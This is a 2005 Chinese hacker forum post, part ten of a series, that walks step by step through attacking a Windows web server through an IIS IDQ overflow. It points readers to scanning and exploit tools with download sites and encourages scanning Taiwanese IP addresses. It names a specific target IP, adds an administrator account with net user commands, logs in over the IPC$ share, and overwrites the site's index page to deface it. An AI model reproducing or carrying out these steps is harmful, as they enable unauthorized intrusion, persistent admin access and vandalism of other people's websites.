黑色海岸线论坛 - Powered by Discuz! Board

标题: 黑客常见攻击介绍（十） [打印本页]

作者: 风幻残林 时间: 2005-1-19 10:34 标题: 黑客常见攻击介绍（十）

开门见山!!!!!!我们的习惯!!利用IDQ溢出漏洞!!工具:ya_scan扫描器!!这是绿鹰联盟站长写的!~真不
错!!IDQ溢出工具!!下载地址:http://go.163.com/lvker 2: http://www.cnqb.org
首先用ya_scan扫描台湾IP的80端口(不要问我为什么)呵呵告诉你吧80是http服务呀只有开了.扫到
这样的主机才有机会呀!!!!!比如我们扫一台IP为211.108.36.41这机子有IDQ漏洞!!开始了:用IDQ溢出
工具填上IP后面的端口就不用改了!!然后捆的那台命令改成cmd.exe这样如果真溢出了就会拿到
system权限的!然后
net user hack 123 /add
这个命令在211.108.36.41上建一个用户!!
net localgroup administrators hack /add
把我们建的用户加到超管级时@@哈哈!!(革命还没成功呀!!)
(211.108.36.41)c:\winnt\system32\set
(这个命令是来看看主页的位置这里就不细说了!!其实是我记不清了!好常时间没黑了!!)
比如说找到主页在(211.108.36.41)c:\inetpub\wwwroot下面!!这回他死定了!!哈哈!
(211.108.36.41) c:\winnt\system32\exit
(我出来了!!不要问为什么..我要传黑页了!)
(本机)c:\net use \\211.108.36.41\ipc$ "123" /user:"hack"
(本机)c:\copy index.htm \\211.108.36.41\c$\inetpub\wwwroot\index.htm
(我这里先把黑页index.htm文件copy到C盘了!)
注意一般主页默为文件名为(index.htm index.asp default.htm default.asp)
这写到这吧!!

欢迎光临黑色海岸线论坛 (http://bbs.thysea.com/)